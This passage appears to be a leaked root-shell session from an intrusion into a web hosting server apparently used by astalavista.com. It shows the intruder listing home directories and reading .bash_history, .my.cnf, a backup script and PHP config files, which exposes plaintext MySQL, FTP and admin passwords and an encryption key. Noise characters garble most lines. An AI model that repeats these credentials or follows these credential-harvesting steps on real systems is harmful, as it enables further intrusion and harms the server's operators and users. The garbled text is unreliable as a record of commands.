#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
! x1 P: Y6 P3 y/ b- m2 {- v, A- }! Z# |__| [__ | |__| | |__| | | | [__ | |__| #; K4 Q; g6 P, r9 P$ I; U5 G: f
# | | ___] | | | |___ | | \/ | ___] | | | #
. e% N& l/ x! L! L# #/ g9 B0 V2 k |* t
#####################################################
' z n' K9 V7 i/ R- X% @- j# #
5 H) P/ j, U @# Admin Contact - 链接标记support@secureservertech.com #
* ?2 C1 L! E2 c! A) v6 z# {% q' o# #
9 R7 ^$ g4 G8 a5 ~# Available ShortCuts #% L! m# i4 C& H" h: q- P' n
# #. |- h* b" [" C c' v/ _! b9 E
# nst - list active connections #
5 T% K! B/ K+ s* {# ddos - shows how many times each ip is connected #
& F/ S; O- R* c; i6 L% @ d# ltr - restart the webserver ## B; N9 `. e( q' ~3 u% f# @
# phpc - edit the php config file #8 l$ c1 `( _" E3 b
# htc - edit the webserver configuration file #
1 h9 @7 Y& B6 @- m* s" n, `# up - uptime #
3 H" G8 a0 l2 |; l1 S# etd - edit the motd of the day file #9 }4 \ z: i! C6 q: e' A
# htr - start and restart apache if needed #
+ e/ e6 Y- W3 d; c! R9 U4 [# syng - shows active SYN_RECV connections #
@2 u% }- g$ E5 T# synd - syn flood blocker - “synd -h” for usage #4 i$ \/ i9 P% J3 h- H z
#####################################################0 S& o! O( f9 V+ X
# NOTES: #7 h+ E( |' Q* Q1 k
# Last Upgrade - 12-08-2008 by JF #
0 P1 T9 n3 i& @; K- c7 E0 |% b4 V, b# My.cnf/Mysql Optimization - 1-28-09 #
0 ?7 f: Z: j" Q6 u+ I3 u: ^, [# #
* c4 L, n+ P# D4 }& |2 M# #" X7 a( \$ t! _* q+ T$ i
# #& H" S* k" h! a7 }: Z( [, v
#####################################################, P& k( i' `/ S3 G
% p& E$ w2 o& G9 P- m4 F% xsh-3.2# lastlog | grep -v Never( G6 ~: k! t4 O: s% {0 q3 o
Username Port From Latest
9 l2 ~" @4 a; o( P4 b3 G( Aroot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
4 |0 U8 n2 O# ]0 O* ?admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008$ t7 c# s" I- @7 U% H- \4 D
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
- l! _' }2 r P' D' l9 d, A& z2 Qastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
( q! s4 K- Y) P q, B& }$ F4 V& D+ u
sh-3.2# ls -la
3 I1 y* C9 `) X/ [total 453376- [& M. Y, q# q1 I9 {+ o
drwxr-x— 15 root root 4096 Jun 4 08:40 .
; Q. l& _) s# {( }drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
1 n; d F" z$ ]-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip% X+ w$ s7 E! s- F
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
+ R7 R" q% [' J# R: d-rw——- 1 root root 16836 Jun 4 07:21 .bash_history. L( Q8 `+ d$ i5 ~' E+ h
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
% g6 u2 e: u4 K* g( i U8 m$ X% {-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
' u* ^& l1 D8 B% A( k-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc! H* K d. L' _% e
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
8 T$ Z0 W# ^: v3 Z- P& ]-rw-r–r– 1 root root 1327 Nov 29 2007 cert, C4 `$ \2 J* u, F
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
. R7 t5 ~: _, {7 j0 y: k4 ndrwxr-xr-x 4 root root 4096 May 20 2008 .cpan
* o' ~7 |0 S" \, u-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc% s6 O- p# z6 e$ ^
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql: S7 b" V; B) Z
drwx—— 2 root root 4096 Oct 28 2007 .elinks/ V8 `. y1 ~ M5 T2 ~
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.15 @) _5 p9 O( Y+ _1 B
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz29 n. i# x6 x J* D0 [* Q
-rw——- 1 root root 0 Apr 16 13:19 .history, Z1 Y" y/ B; ]
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
; H) H V% z: F# r-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog- k1 [8 { o6 n. x
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
/ C! p. ]- q0 Z5 {& U3 a-rw——- 1 root root 35 Jun 2 14:23 .lesshst/ W- j0 H! u+ I& u1 E4 c
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
8 d+ T2 A; G/ x; m. V& L% L5 {drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec3 t- I" O6 h+ i% E8 M
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
$ F( h7 ^- _# D7 R2 v-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2' E+ _2 p# I( b
-rwx—— 1 root root 760 Sep 18 2008 lp
. F& b% M% A7 | L5 Sdrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
! v, _7 u1 b( _5 r$ l4 l! w8 ~-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
0 d* A+ }# `6 h8 B9 { Z-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
2 M; Y a9 K/ H, c4 _% Odrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
4 l! z: W' e2 H0 ~* d7 v2 y-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz( [2 L" ?% v3 ?5 Q7 s
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
8 f- E. a2 S+ Q-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz5 q: }: y) H4 o, [0 z* f' q; a
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
: c% s( b1 F8 f, j& m- L, V-rw——- 1 root root 41 Oct 19 2007 .my.cnf
, w C1 ~( [1 l9 x, n-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history" w- R% p4 Y. G; w
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport) r# x! R8 M: j7 D/ j1 U
-rw——- 1 root root 41 May 20 2008 .mytop$ t" a2 w' w& ~
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
8 }; Y' y" R2 L5 y2 K7 a-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz. ]6 f$ b( J( M8 o
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
& V- C: O0 g7 ^4 ?9 x, Q-rw——- 1 root root 1462 Sep 21 2007 opt.php& m0 [6 r$ p* a! m: Q/ p
-rw-r–r– 1 root root 3371 Sep 22 2007 p
) Q. y/ k- l0 t& l0 \-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2" ]' [! E( B9 @3 m8 G C& t
-rw——- 1 root root 1024 Feb 3 21:32 .rnd
+ ^$ v: r) E; M) s0 Z$ `. h-rw-r–r– 1 root root 716 Nov 28 2007 server.csr. y, P0 t( ]+ |- @# v) T$ H+ d
-rw-r–r– 1 root root 887 Nov 28 2007 server.key8 w# F. J% c" N% e1 K2 t0 L
drwx—— 2 root root 4096 Oct 10 2008 .ssh# u6 r: s4 r$ F d) ~, n' ~
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
1 R2 _( B: }/ A' `3 M. e1 c-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc( x' t6 ^ B' ?* C7 t: P
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
$ y7 w6 _. G) F6 Q-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
: u4 ?- v5 a3 R* t' X2 cdrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
* J! W0 D% d4 A5 P) P-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
4 o0 m0 k* ^- b/ \; ]) Jdrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.01 ~$ n9 E# g0 x) @+ I3 C$ o
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2$ T1 {, h2 V k+ T
-rw——- 1 root root 12997 May 16 2008 .viminfo. j1 _$ ] d9 {" J: ~
! ~3 g6 l7 |8 u! @* Ssh-3.2# cat .bash_history
3 w- [9 t, t/ j" H; P[snip]3 C8 ]( T5 k2 R2 f3 p
wget cp4sst.com/sstlinux.tar.gz* ~2 a# m7 y A% O* T. a$ b( t; I
tar zxvf sstlinux.tar.gz
, R. i& ~; ?. h- N4 Qcd linux-2.6.27.10
3 H4 O( ?$ l% M( A2 _sh install.sh' A+ [2 ~6 p- B: M4 _- x, |4 s# m
make bzImage ; make modules ; make modules_install ; make install' f* O9 G- }) J, \
make clean
' I* g O6 V2 J3 Kservice mysqld restart s5 A6 \. z+ C
[snip]. `) z2 c9 D; |5 I7 D! S6 v- @8 H
cd /usr/sbin/8 o" I1 j( s) r. E4 t
chmod 4777 traceroute
; D4 u5 B0 \) B( _0 f$ Cchmod 4777 ping U2 \6 f. W5 C! M) Y% |" ^
traceroute -I 链接标记[url]www.astalavista.ch[/url]
3 c+ I5 p& m% T4 L; w[snip]6 `. `! n$ x& z
vi /etc/csf/csf.conf
% C8 F! t) l5 c9 g; x4 ztraceroute google.ch
0 p% q- A7 ^ `service csf restart; l. w: H1 N x4 u: b6 T
tracert google.ch; J5 y Y4 n5 @! @( w5 }; x
service csf restart
, O) X% d& J# x. C' u+ w- Ztraceroute 链接标记[url]www.google.ch[/url]* ~ g9 |+ Q5 q3 A! x
tracert 链接标记[url]www.google.ch[/url]
# \' E+ o# |4 } F1 ntraceroute 链接标记[url]www.google.ch[/url]
8 z3 F, [+ X. L4 @: @5 Mlocate traceroute) m( B/ P$ B. [& W+ U
chown 4755 /bin/traceroute: w. X' ]2 t1 v- P2 H
chown 4777 /bin/traceroute
! X2 ^3 `* Y- U6 o8 W L$ ulocate ping
1 n" |7 T% c2 a' O3 E1 ]chown 4755 /bin/ping
7 q C! ]6 d& |chown 4777 /bin/ping. a& a& I, I H1 Z1 q3 z: l: B
cd /bin/! Q$ E% K8 @% z. i) o6 t! G
ls -ali | grep ping
/ V( U( T* {- m* `( V9 ?3 W$ vchown root ping G; ?5 m4 [3 v! k
chmod 4755 ping4 n3 B0 u% S% P) q
ls -ali | grep traceroute
- W/ G$ _8 a/ r2 i1 |% {! L0 bchown root traceroute1 C# c- Q" o0 d/ Z. {
chmod 4755 traceroute
* C! v! u) o' [ls -ali | grep traceroute
% \% k6 N' `0 L) ^3 z; @; Itraceroute -I 链接标记[url]www.google.ch[/url]
% R1 J- f4 g0 P9 }traceroute 链接标记[url]www.google.ch[/url]
9 L- _8 W& t2 m; k( }whois pmsantos.ch+ Y" A) P, p8 v
[snip]3 g" V5 N T f* o; r$ o
mysql -h com_contrexx2_live < /root/defaultp_ports.sql
2 S3 q- \# l% [! n' [mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql" _8 ?9 M! c/ I J
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
, R4 |# A& }; S/ j; D% {7 hmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql: E* g; `+ n s, ~# m( e s
top6 `/ ^6 [8 N1 J2 I$ R) t6 I# U
ping ssth.ch
- G- D3 o9 k% T1 g) Oping asdlkfaljgasd???ljg???lasj.ch3 R, a; F' X8 M2 H l6 w, R
ping asdlkfaljgasdlasj.ch
4 n! p) v. H4 Yping 链接标记[url]www.ssth.ch[/url]
+ o; E/ g! R7 [" G! m* E9 r" L; zping ssth.ch
! I& w, \3 C& @, [& O4 r& d- Pnslookup 链接标记[url]www.google.ch[/url]
2 i9 x0 H# ?9 c; a' }& I! Pnslookup 链接标记[url]www.ssth.ch[/url]
" ^6 t* a: ^& H7 w7 Z/ u1 m: [man nslookup8 b8 a' I h) K, [" t
ping 链接标记[url]www.google.ch[/url]% K% `/ R% H( ]: G' x' q( ]
nslookup 链接标记[url]www.google.ch[/url]1 f2 X9 X; a* o
nslookup 链接标记[url]www.google.ch[/url]
a" p; {' m8 ^& x3 N3 \nslookup salfjasdlf.ch
3 z: f+ f! r: l# E1 F& M[snip]
$ x) E |3 k% u1 p x$ Dopenssl passwd -1 sadf
$ d/ l5 E# `- `5 [3 yopenssl passwd -1 5cZNHstdTy
( M5 ]9 n" m! [% I! ]mysql
. L d1 U7 A& L6 L' ymysql
K4 H1 y1 o" D# K7 a5 `. k- w( vlocate proftp
6 _. t- d7 J- P& H( Ivi /etc/proftpd.passwd
3 U9 t- @; J' B7 a: pservice proftpd restart! B0 t( `; l5 E" [& U: f0 B
locate proftpd.conf
8 G3 V& _# h) {3 R* k7 }& ~- h' Bvi /etc/proftpd.conf
& |( n0 j2 u- Avi /etc/proftpd.passwd
( A4 l, p! ]/ f) dservice proftpd restart
_( ^; z' ]2 R/ v" o[snip]
4 ?% K! U: @9 r1 x) l6 I5 q' C/bin/sh /home/com/backup_system/backup.sh! D) k9 a0 l& M2 N
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin8 e6 v& y! d3 P$ J$ n d1 I d. `) h1 x
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
- X3 X) B) ]! t) ]: a" C7 nmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
/ p0 u. p( F! V' M- u+ ^; ols -ali
, X3 A3 F/ S5 z0 Z- o3 tmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql) R& E O, _( D7 x; |, _
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql$ a6 g1 U& W: [# h+ i4 m
crontab -l8 @1 q. u$ ]; @9 t# `
crontab -l% I. P) r/ m# A4 j( I% S
php -q /home/com/public_html/modifications/cronjobs/securitynews.php
) R) ^5 e8 {" ?8 b8 r* n! h/home/com/public_html/modifications/cronjobs/exploits.sh/ J0 r( I3 x2 `, F5 @* q, x
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]+ y* m( k# W1 X3 o9 W
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz# M/ q+ c( K d
cd lsws-4.0.3
V6 E8 p3 I5 Q( ~8 \7 w% |sh install.sh
* k1 Y% d( ]4 X8 a3 N$ n" ?uptime
/ A( v( x. [! R' K! c Z& ?* ghdparm -tt /dev/sda8 Y- U: r9 p+ [2 h" W( d i" e: y
iostat$ j2 Y" a& `$ J5 p
yum install iostat. l( x/ G) D5 _* B% e
iostat1 D R& _+ W( _7 W9 k
whereis iostat
: \. J1 y& f( G3 Eyjm clean all& F& V, i( S- ~8 o9 g$ O3 S
yum clean all ; yum -y update
" @9 f4 y0 M+ Z4 H, O0 w1 tiostat
7 k6 p" T F: Hyum install systat
& {/ B* N1 F! u7 I9 lrpm -qa | grep iostat) H* `' k9 o# V1 X
rpm -qa | grep sysstat
/ o5 t" ?$ W. J, Z) N; y( `3 D7 y qrpm -qa | grep systat
6 n) M# [3 l( n; u6 v+ Q3 Kdmesg -c
; p7 F& s$ | P7 t- ?* e3 |. n Asysctl -p
' e% j% l7 ?) D* {7 t5 euname -r+ r& M# w2 T# E% j4 Y- E7 ^
cd /usr/src5 }4 ]5 B& d, D: @6 y) i
wget nix101.com/kernels/sstlinux.tar.gz
& a3 b. ~; k) t; {5 a) Gshutdown -r now* t, J3 {/ g( v. o# O- B& y9 j" c
nano -w /boot/grub/grub.conf
& v7 P! o6 d9 T
: Q7 d$ N# j% u/ P, h4 Zsh-3.2# cat .my.cnf) D! p! b$ x+ [& ]4 n8 Z0 w
[client]( p& S9 T, |8 Z$ P$ g h. }7 y- Y
user=da_admin& ]1 [7 P2 r% l+ y$ Y- Q6 I
password=X9dctmRH
, g3 ]1 a0 G5 }1 p9 U) ^) w3 ^3 V
6 K6 Q% ^. h% @ d* ~ ~0 X$ p$ Rsh-3.2# cat /home/com/backup_system/backup.sh4 t- f7 o7 B. W- [$ C8 G t) E
#!/bin/sh g8 ?; b2 V) p5 e. o
#####################################################################
) A% d/ j, [2 M# #- r7 _( i7 r' g6 ~1 j% f
# incremental backup for astalavista.com #
9 T+ |' N. [$ t. ]" L# #
" ]( m0 K1 y: l1 e: b1 W ?# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
' l- o* v% Y3 I- \. K0 }# #
" x; ?5 a% k5 L! f2 v' L- l#####################################################################
! l- V" ^* t, b3 a# H- C[snip]
2 S1 d' I! R5 hPROG_DIR=”/home/com/backup_system”;
( ~; x5 ?" D% n* I9 ^BACKUP_DIR=”/home/com/backups”;
6 b8 q! b* n$ z3 B, i* i: I; aDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;( r! {/ [1 `+ U/ u
# ftp for synology backup server
& L9 M! T' R/ \FTP_HOST=”212.254.194.163″;
9 n; N- y% l+ r3 _2 m, x9 G4 LFTP_PORT=”21″;
$ \- K& c' R/ ^+ i0 X4 VFTP_USER=”astalavista.com”;
- s' w* _, Z7 _$ S; B' r; kFTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
. g+ O5 T* L# }' t9 }6 F. @FTP_DIR=”/astalavista.com”;8 O1 e" k* b( ]5 @ ~
# database9 K! C) @: @' i8 j; W! f( w
DB_HOST=”localhost”;
2 M, j% |5 E# D' g; Z: yDB_USER=”contrexxuser2″;
$ w# j0 t# h, c6 X nDB_PASS=”0fEYNZgXz1pKe”;
0 T9 J* S; i4 d# m* i! S$ E2 `DB_DATABASE1=”com_contrexx2_live”; L: Z8 w3 _+ }: C% f/ p
DB_DATABASE2=”com_contrexx2″;- V: H7 m3 }1 l$ i* m! E' W
[snip]
- r6 e0 t7 R& y& ]- sftp -in $FTP_HOST $FTP_PORT <<EOF$ u' Y X. A# S$ R
quote USER $FTP_USER
0 O$ v# W- S* n' L9 p) n+ wquote PASS $FTP_PASS
2 \9 P8 q* r) S$ ?; m# hcd $FTP_DIR
8 }. t: L2 L+ T! ]put $DB_FULLNAME-SQL_Dump.tar, H" v9 f3 ~0 ^# j4 y3 G
put $BACKUP_FULLNAME-Public_HTML.tar" U( f% ?( b3 u. ?, F
close: H0 U/ d( A" y$ x: V' K* ]) c3 J4 k2 \
bye
0 O5 p4 q \, ]' m8 |EOF' v# c0 X, K. u, |* I5 D) n
# l+ e+ _* b5 I& M0 x* _sh-3.2# cd /home9 ~; H$ u! g+ E5 z
sh-3.2# ls -la5 l/ p8 M3 d4 h0 h
total 120
( I. k4 ?0 S% mdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .; I I ~( p$ U. q( D
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
: A5 Q; {# p9 D6 @" G; Zdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin7 w5 J( W8 I6 V6 _
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group5 ~4 w x- B. T. Q2 z9 d3 x- @
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
* e- [8 \; W( Mdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet* ]. K6 n5 n% Q7 d7 A
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup7 N5 ]$ @% D/ P; c u
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161/ {# q3 Y2 K+ e! Z$ q4 x, m
drwx–x–x 10 com com 4096 Apr 28 12:40 com+ r2 W) C C' g: K/ c) E) j
drwxr-xr-x 2 root root 4096 May 17 2007 ftp( F& i p" h- H
drwx—— 3 jon jon 4096 Sep 21 2007 jon4 M9 x7 S2 w' j% _: o
drwx—— 2 root root 16384 Sep 11 2007 lost+found+ j6 R' g. m6 f
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
$ c2 W. Y5 o/ a+ Y. idrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata, X' t5 ]% E3 y* p
drwx—— 2 jon jon 4096 Sep 15 2007 test$ F' s' T& L1 Q% Q( f
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp1 a: Y) S. r5 x6 O4 ^- d) R
, e- M) T/ m* X0 b/ ?' E( i
sh-3.2# cd admin4 d! o& o: B- \- }# @
sh-3.2# ls -la
c: C6 Q% H0 z- c- I# x" K' Ftotal 1735896; Y8 k8 m: H. k& l8 P
drwx–x–x 9 admin admin 4096 Nov 28 2007 .1 X; A/ S9 l8 D+ |- B; ]9 b% ]
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
% a+ c' e* D7 ?drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
0 f* U/ q- ] e/ \$ |drwx—— 2 admin admin 4096 Sep 28 2007 backups
* ^3 e5 |* Q; ?# v-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
; K! |/ D8 W+ ]7 N3 h-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout4 I: x! w; L+ X9 _! c6 h
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
6 F, a4 p" t# S( O8 J-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
. b4 e6 g5 q8 ^$ P1 j. U& adrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
$ O1 h+ y3 R+ ddrwx–x–x 6 admin admin 4096 Sep 21 2007 domains
& a5 Z8 }1 S$ |drwxrwx— 3 admin mail 4096 Sep 21 2007 imap
5 e z8 L5 v3 L7 F6 [2 M-rw-r–r– 1 root root 24 Sep 21 2007 info.php: f- X8 D% C0 e
drwx—— 2 admin admin 4096 Sep 21 2007 mail7 h" E3 I6 M1 a! a" l+ o
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
7 e5 \- j8 I+ w0 W4 r9 G-rw-r–r– 1 root root 887 Nov 28 2007 server.key; f2 C; t& `. L7 X
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
" H5 S* x( `* u! ?-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
0 V1 a1 N, X4 A/ Xdrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups6 M2 y4 [) f* z2 W+ H
' W4 i0 ~5 `5 J! t3 G, tsh-3.2# ..
3 H2 R* O+ q! [0 vsh-3.2# cd jon3 r+ G2 t; o2 V/ k
sh-3.2# ls -la9 U( Z( m- F) A. Y" N3 j3 w3 f; e
total 36
# Y- x' n$ d* f1 z3 rdrwx—— 3 jon jon 4096 Sep 21 2007 .0 n, Q8 A" Z P% m8 M
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
& R; Q! j& n2 u+ K! a/ |-rw——- 1 jon jon 53 Sep 21 2007 .bash_history
, C0 I9 [/ i A1 S0 ~-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout, D, |4 `6 v7 k( \$ L- T& U2 f& g3 R
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile5 Z* c3 Z; Q0 u/ B/ Q
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
& `4 s T; G# T* K3 ?& I% N2 J-rw-r–r– 1 root root 24 Sep 21 2007 info.php
1 I. v. ?( w8 R% j9 o+ q& adrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html) E; d2 C. Y( t% F
6 D8 \% ?6 W& |8 y" u- q
sh-3.2# cd ..
/ n6 j9 R9 f+ K& [7 z7 ^sh-3.2# cd test
: e" X5 k( H1 n9 O2 }$ m3 Lsh-3.2# ls -la
: b: p' ~3 Y' k3 u/ q, x0 o* btotal 48# a* V+ c' O" g! n5 }
drwx—— 2 jon jon 4096 Sep 15 2007 .
5 x' b$ X) i& Q+ X6 y! r% ^drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
+ l3 ~1 S- ^ {. I-rw——- 1 jon jon 79 Sep 21 2007 .bash_history/ N) t8 a5 e" k1 E* J& q) \/ h# u
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
# d9 [# R; T3 u& t1 O-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile7 u8 ?) s- k1 K) l
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
, }8 r; \/ U4 _4 p$ }; Q% g: q" ish-3.2# cat .bash_history
T8 W* r ?0 b/usr/bin/mysqladmin -u root password PoliuJhytg67# u) `" B! C& D2 e# C# G5 C
! h# L! u, J/ m5 b1 e1 [# N
sh-3.2# cd ..6 ?- v0 {9 |7 t: O
sh-3.2# cd astanet
( P% j4 |6 w) a- u7 msh-3.2# ls -la: P [4 E# @2 o+ h
total 52
$ T. E8 ^; m4 q/ _: Y9 ?drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
7 e, m. L- ]- A( F% fdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..9 ?8 i( X! s# M! T
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
2 O( A% v/ @- t& Y, a$ M1 c-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history) N+ `5 ]; v( q/ g& T
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
. U6 U, A5 x; a0 ]$ k& ~! I-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
- E: L+ ~3 |: u% J-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc# O2 x8 ~5 P! b6 u8 f& G3 J* h! i
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains) B7 z c% P$ N, P" g; b
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap+ h; S, _ z: ]1 `2 t
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail" }$ y! e& f- d& G4 ]
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history; V$ w& }$ Q, L
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html' \8 l2 c8 i6 l' D( o* [& g
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
* u+ I9 K+ C5 @& _9 }, C6 n" G2 T8 |6 f6 R9 V% y9 t5 e# c) {8 O9 d
sh-3.2# cd auth/
3 m; c5 X& P4 a' j: {0 w: z& Dsh-3.2# ls -la5 z- Y* q: ]# M3 H, w, O$ c
total 28
# ^+ U$ ?$ i, v" }, U Ldrwxr-xr-x 2 root root 4096 Dec 23 16:00 .% ~2 ~! H8 N9 k1 h* R
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
2 f/ T6 c9 s! R4 M. B-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
" i$ I5 y. |, i; |' c-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
" E6 C F7 O# q6 r) S-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd6 ` N3 n9 b0 v! _ c r; z" Q) I3 T
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting2 H5 x; f9 H( A! q3 E
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
% g1 C: u- z/ L+ h3 G
: s/ i7 q4 |) {1 f# qsh-3.2# cat hackercontest.config.inc.php
6 f5 _7 d0 i% w; R1 C4 H: n% ~ V<?PHP, b# D+ m! K' h! U: b
// Variabeln f?r Verbindung zur Datenbank //$ V! K5 _6 r- }+ a
$conxHost = ‘localhost’; // MySQL hostname
9 N, \& [+ W1 o7 N1 J' J. x$conxUser = ‘hackercontest’; // MySQL user
, c- f4 e7 W# Z% p$ k- P0 ?& E1 d$conxPassword = ‘K6m@7dUc’; // MySQL password6 K b$ _$ f) b- r& G
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
! S# Z9 J1 k0 M8 x! z2 B2 y?>% O7 }6 @2 [* K2 p! h
sh-3.2# cat hosting.config.inc.php5 o; {( C5 A* M& m3 S+ S2 H
<?PHP% ~; U4 F4 I" }' t5 W) o
// Variabeln f?r Verbindung zur Datenbank //
6 o9 V2 P* ?, W6 q0 ]. m, ^6 o- H$conxHost = ‘localhost’; // MySQL hostname; H2 w; h' U8 I+ l% \8 ^4 P' ?$ p$ m
$conxUser = ‘hostinguser’; // MySQL user
5 u c5 d: A9 B% X$conxPassword = ‘cXvB3981′; // MySQL password
3 N# r' N# @7 a$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish6 Z; m2 y% z% q4 _* e( d
?>% ~6 t1 E+ T& Y6 @ x* z
7 x2 s7 D- J$ w% Fsh-3.2# cd ..( x7 j6 y- _- E+ C
sh-3.2# cd com7 l4 Y4 H; l6 Z
sh-3.2# ls -la* q5 \) q- x$ ^# p$ a" J: g8 ^& R8 c6 q
total 141208
7 J6 r. i) |. `2 g( n- m4 q5 Wdrwx–x–x 10 com com 4096 Apr 28 12:40 ." b8 a8 o- {5 [2 W
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..8 D; O# N4 O1 W" _% d5 x
drwx—— 2 com com 4096 Jun 4 04:04 backups
